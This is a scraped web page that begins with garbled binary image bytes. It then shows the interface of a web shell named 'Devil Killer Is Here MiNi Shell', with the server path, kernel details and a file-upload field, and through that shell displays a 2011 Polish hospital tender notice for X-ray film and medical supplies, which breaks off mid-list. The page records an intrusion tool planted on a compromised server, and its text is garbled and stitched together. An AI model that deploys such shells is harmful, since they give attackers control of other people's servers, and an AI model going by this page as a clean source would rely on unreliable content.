JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110523/144861-N-2011.html

<p class="kh_header"><b>Rzeszów: Dostawa błon rtg, wywoływaczy i utrwalaczy rentgenowskich, kotwiczek lokalizacyjnych, wkładów do strzykawek automatycznych oraz dzierżawa urządzeń</b><br>
<b>Numer ogłoszenia: 144861 - 2011; data zamieszczenia: 23.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny im. Fryderyka Chopina , ul. Szopena 2, 35-055 Rzeszów, woj. podkarpackie, tel. 017 8666 096, faks 017 8666 097.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.szpital.rzeszow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa błon rtg, wywoływaczy i utrwalaczy rentgenowskich, kotwiczek lokalizacyjnych, wkładów do strzykawek automatycznych oraz dzierżawa urządzeń.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa błon rtg, wywoływaczy i utrwalaczy rentgenowskich, kotwiczek lokalizacyjnych , wkładów do strzykawek automatycznych oraz dzierżawa urządzeń medycznych, wyszczególnionych w 4 Częściach dla Wojewódzkiego Szpitala Specjalistycznego im. F. Chopina w Rzeszowie tj.: Część nr 1-Błony ogólnodiagnostyczne, zielonoczułe, stomatologiczne zębowe, zgryzowe, mammograficzne, wywoływacze i utrwalacze rentgenowskie, dzierżawa wywoływarek zdjęć RTG oraz dzierżawa mieszalników do odczynników chemicznych; Część nr 2-Błony do kamery dokumentacyjnej oraz dzierżawa kamery dokumentacyjnej dwuformatowej , fabrycznie nowej, do posiadanych przez Zamawiającego: tomografu komputerowego oraz aparatu do badań naczyniowych; Część nr 3-Kotwiczki lokalizacyjne używane do przedoperacyjnego oznaczania niewyczuwalnych dotykowo zmian w  piersi; Część nr 4-Wkłady do posiadanej przez Zamawiającego strzykawki automatycznej.
Szczegółowy opis potrzeb zamawiającego zawierający wymagania oraz orientacyjne ilości dostaw w okresie objętym zamówieniem został zawarty w Załączniku nr 8 do SIWZ  - Formularze cenowo - ofertowe do każdej z Części oraz do Części nr 1 również w Załączniku nr 9 do SIWZ - Zestawienie parametrów granicznych. 
Wymagania zamawiającego: 
a)Dostawy przedmiotów zamówienia z Części nr 1 do 4 na koszt i ryzyko Wykonawcy do  magazynu Zamawiającego w  dni robocze tj. od poniedziałku do piątku w godzinach od 8:00 do 13:00, w ciągu 5 dni roboczych od złożenia pisemnego zamówienia faksem przez Dział Zaopatrzenia;
b)Do każdej dostawy wykonawca dołączy dokumenty potwierdzające nazwę - rodzaj, ilość i cenę towaru będącego przedmiotem dostawy, faktura VAT;
c)Wykonawca winien zagwarantować dostawę (transport) przedmiotów zamówienia do magazynu  Zamawiającego, zgodnie z warunkami przewidywanymi przez producenta  dla określonych preparatów;
d)Dostarczony towar musi posiadać na opakowaniach opis: nazwę, ilość, termin ważności do użycia;
e)W przypadku dzierżawy urządzeń Wykonawca winien gwarantować ich utrzymanie w pełnej sprawności,wymagany pełny bezplatny serwis gwarancyjny przez 18 m-cy. Wszystkie niezbędne przeglądy i naprawy zapewniający ich sprawność przez cały czas trwania umowy. Wykonawca winien w szczególności ponieść koszty:
- przeglądów wymaganych przez producenta łącznie z materiałami potrzebnymi do ich wykonania,
- usuwania awarii, które wystąpią podczas eksploatacji,
- montaż urządzeń w ciągu 14 dni od daty podpisania umowy.
Ilości wskazane w Załączniku nr 8 do SIWZ - Formularze cenowo - ofertowe dla Części nr od 1 do 4 są wielkościami orientacyjnymi, przyjętymi w celu porównania ofert i wyboru najkorzystniejszej oferty.
Zamawiający dopuszcza składanie ofert równoważnych w Części nr 1 w pozycjach od nr 14 do 19 oraz w Części nr 4. Przez ofertę równoważną w Części nr 1 pozycje od 14 do 19  należy rozumieć, zaoferowanie przedmiotów zamówienia kompatybilnych z posiadanymi w Szpitalu urządzeniami. Zamawiający posiada kasety mammograficzne firmy Agfa. Wykonawca oferujący produkty innej firmy niż Agfa zobowiązany jest do udostępnienia na czas trwania umowy kompletu nowych kaset z ekranami kompatybilnymi (tego samego producenta) z oferowanym sprzętem i materiałami w ilości:
poz. nr 14. 18 cm x 24 cm - mammograficzne - szt. 12;
poz. nr 15. 24 cm x 30 cm - mammograficzne - szt. 8.
Zaopatrzenie pracowni mammograficznej w urządzenia do obróbki fotochemicznej, odczynniki, błony mammograficzne oraz kasety tego samego producenta jest jednym z wymagań oceny jakości pracowni do wykonywania badań skryningowych NFZ, przeprowadzanej przez Centralny Ośrodek Koordynacyjny w Warszawie - zarządzenie Prezesa NFZ nr 54/2006 zał. nr 6, w sprawie unifikacji sprzętu i materiałów w pracowni mammograficznej.
Przez ofertę równoważną w Części nr 4 należy rozumieć wkłady do strzykawki automatycznej o pojemności 200 ml kompatybilne z posiadanym przez zamawiajacego wstrzykiwaczem Medrad Vistron CT.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 32.35.41.10-3, 24.93.12.30-0, 24.93.12.40-3, 38.65.33.00-0, 42.96.21.00-8, 33.16.95.00-7, 33.14.13.10-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wadium wnosi się przed upływem terminu składania ofert. Kwota wadium dla poszczególnych części wynosi: 
Część nr 1 -         2 000,00 zł;
Część nr 2 -         3 000,00 zł;
Część nr 3 -            900,00 zł;
Część nr 4 -            400,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony  jeżeli Wykonawca przedstawi informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy,   potrzebną do zrealizowania dostaw przedmiotu zamówienia przez 2 miesiące realizacji umowy. Wysokość tej kwoty uzależniona jest od tego, do których części wykonawca składa ofertę. Wymagane kwoty w poszczególnych częściach przedstawiają się następująco: 
Część nr 1 -           24 000,00 zł;
Część nr 2 -           29 500,00 zł;
Część nr 3 -           10 500,00 zł;
Część nr 4 -             4 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zamawiający wymaga, by oferowane przedmioty zamówienia w Części od nr 1 do 4:
a)jeśli są wyrobami medycznymi w rozumieniu Ustawy z dnia 20 maja 2010r. o wyrobach medycznych   (Dz. U. 2010, Nr 107 z 2010r. , poz. 679 z późn.zmian.) spełniały wymagania ustawy, były dopuszczone do obrotu i używania oraz  posiadały:
    - Deklarację zgodności CE
   lub 
    - Certyfikat zgodności, potwierdzający spełnienie wymagań, wydany przez jednostkę notyfikowaną  - dotyczy oferowanych wyrobów medycznych klasy I sterylnej, IIa, IIb, III ,
b)spełniały wymagania Opisu Przedmiotu Zamówienia  (Rozdział 1 pkt III SIWZ),
c)wywoływacze i utrwalacze do obróbki automatycznej były zgłoszone do Biura ds. Substancji Chemicznych i by posiadały karty charakterystyki - dot. Części nr 1.
Kserokopie dokumentów wymienionych w pkt. a) i c) powyżej w przypadku podpisania umowy w danej oferowanej Części, Wykonawca winien dostarczyć Kierownikowi  Zaopatrzenia Zamawiającego wraz z pierwszą dostawą. W celu potwierdzenia wymagań opisanych powyżej Wykonawca winien załączyć do oferty  Oświadczenie według wzoru na Załączniku nr 5 do SIWZ. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia dopuszcza się  składanie wspólnego oświadczenia o treści jak wyżej. Uwaga: W przypadku braku dostarczenia Kierownikowi Zaopatrzenia Zamawiającego przy pierwszej dostawie dokumentów wymaganych powyżej zawarta umowa zostanie rozwiązana z winy Wykonawcy. Kary umowne będą zastosowane.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy Formularz oferty (wzór Załącznik nr 7 do SIWZ).
2. Wypełnione i podpisane przez osoby upoważnione do reprezentowania wykonawcy zestawienie parametrów granicznych (dot. wyłącznie Części nr 1) wg wzoru na Załącznik nr 9 do SIWZ.
3. Wypełnione i podpisane przez osoby upoważnione do reprezentowania wykonawcy oferowane Formularze cenowo - ofertowe dla danych oferowanych Części, sporządzone według wzorów załączonych do SIWZ (wzór Załącznik nr 8 do SIWZ).
4. Potwierdzenie wniesienia wadium.Kserokopia wniesionego wadium wpięta do oferty w kolejności. Wadium wniesione w formie innej niż w pieniądzu należy złożyć w ofercie luzem celem zrealizowania dyspozycji zawartej w art. 46 ustawy Pzp dot. zwrotu wadium.
5. Jeżeli osoba reprezentująca wykonawcę w postępowaniu o udzielenie zamówienia nie jest 
wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej, wymagane jest przedstawienie pełnomocnictwa. Pełnomocnictwo to 
musi zostać dołączone do oferty, musi w swojej treści jednoznacznie wskazywać uprawnienie do podpisania oferty a także musi być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem (kopia pełnomocnictwa powinna być poświadczona notarialnie). Pełnomocnictwo to musi w swojej treści jednoznacznie wskazywać uprawnienie do podpisania oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust.1 Pzp zamawiający przewidział możliwośc dokonania zmian umowy w SIWZ oraz określił warunki tych zmian</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.szpital.rzeszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny im. F. Chopina ul.Szopena 2, 35-055 Rzeszów - Dział Zamówień Publicznych pok. nr 9, bud.J.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2011 godzina 09:00, miejsce: Wojewódzki Szpital Specjalistyczny im. F. Chopina ul.Szopena 2, 35-055 Rzeszów - Kancelaria Ogólna, pok. nr 3, bud. C. Godziny pracy Kancelarii: od poniedziałku do piątku od 7:30 do 15:05.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1) Planowany termin otwarcia ofert: 01.06.2011 o godz. 10:00 2) Sygnatura sprawy nadana przez zamawiającego: WSS.IS.XII.252/Z/25/11, Postępowanie nr 31. 3) Nie zamierza się zawierać umowy ramowej. 4) Nie przewiduje się zamówień uzupełniających. 5) W punkcie II.2) ze względu na program dodaje się: dostawa i montaż urządzeń wydzierżawianych tj.:
a).  wywoływarek zdjęć RTG  i mieszalników do odczynników chemicznych z  Części nr 1,
b).  kamery dokumentacyjnej dwuformatowej  z Części nr 2,w ciągu 14 dni od daty podpisania umowy wraz z montażem tych urządzeń.
6. W Sekcji III 4.2  punktor trzeci ze względu na program winno być:
Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Spółki cywilne przedstawiają zaświadczenie urzędu skarbowego dla wszystkich wspólników oraz zaświadczenie na całą spółkę cywilną z jej nazwą.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Błony rtg,odczynniki oraz dzierżawa urządzeń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotami zamówienia w Części nr 1 są:
BŁONY RTG OGÓLNODIAGNOSTYCZNE:
1.Błona RTG 18 cm x 24 cm. 
2.Błona RTG 24 cm x 30 cm.
3.Błona RTG 30 cm x 40 cm. 
4.Błona RTG 35 cm x 35 cm.
5.Błona RTG 35 cm x 43 cm.  
6.Błona RTG 18 cm x 43 cm. 
7.Błona RTG 15 cm x 30 cm. 
8.Błona RTG 5 cm x 7 cm (zgryzowa).
9.Błona RTG 4 cm x 3 cm (zębowe).
10.Wywoływacz rentgenowski. 
11.Utrwalacz rentgenowski. 
12.Dzierżawa wywoływarek zdjęć RTG - przez ścianę.
13.Dzierżawa mieszalników do odczynników chemicznych (automikserów).
BŁONY RTG MAMMOGRAFICZNE:
14.Błona RTG mammograficzna z podwójną warstwą emulsji światłoczułej 18 cm x 24 cm. 
15.Błona RTG mammograficzna z podwójną warstwą emulsji światłoczułej 24 cm x 30 cm. 
16.Wywoływacz rentgenowski. 
17.Utrwalacz rentgenowski. 
18.Dzierżawa wywoływarki zdjęć RTG mammograficznych - przez ścianę.
19.Dzierżawa mieszalnika do odczynników chemicznych (automiksera).
Opis potrzeb zamawiającego zawierający wymagania oraz orientacyjne ilości dostaw w okresie objętym zamówieniem został zawarty w Załączniku nr 8 - Formularzu cenowo - ofertowym do Części nr 1 oraz w Załączniku nr 9 - Zestawienie parametrów granicznych ,będących integralną częścią SIWZ.   
Zakres zamówienia obejmuje dostawę przedmiotów zamówienia w ilościach wyszczególnionych w Formularzu cenowo - ofertowym do Części nr 1, będącym integralną częścią SIWZ, przez okres 18 miesięcy oraz dostawę i montaż urządzeń wydzierżawianych w ciągu 14 dni od daty podpisania umowy.
Dopuszcza się składanie ofert równoważnych w Części nr 1 w pozycjach od 14 do 19.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.35.41.10-3, 24.93.12.30-0, 24.93.12.40-3, 38.65.33.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Błony do kamery dokumentacyjnej oraz dzierżawa kamery dwuformatowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotami zamówienia w Części nr 2 są:
1.Błona do kamery dokumentacyjnej 35 cm x 43 cm.
2.Błona do kamery dokumentacyjnej 20 cm x 25 cm.
3.Dzierżawa kamery dokumentacyjnej dwuformatowej fabrycznie nowej do posiadanych przez Zamawiającego: tomografu komputerowego oraz aparatu do badań naczyniowych
Opis potrzeb zamawiającego zawierający orientacyjne ilości dostaw w okresie objętym zamówieniem został zawarty w Załączniku nr 8 - Formularzu cenowo - ofertowym do  Części nr 2 będącym  integralną  częścią SIWZ.   
Zakres zamówienia obejmuje dostawę przedmiotów zamówienia w ilościach wyszczególnionych w Formularzu cenowo - ofertowym do Części nr 2 , będącym integralną częścią SIWZ, przez okres 18 miesięcy oraz dostawę i montaż urządzeń wydzierżawianych w ciągu 14 dni od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.35.41.10-3, 42.96.21.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kotwiczki lokalizacyjne.</p>
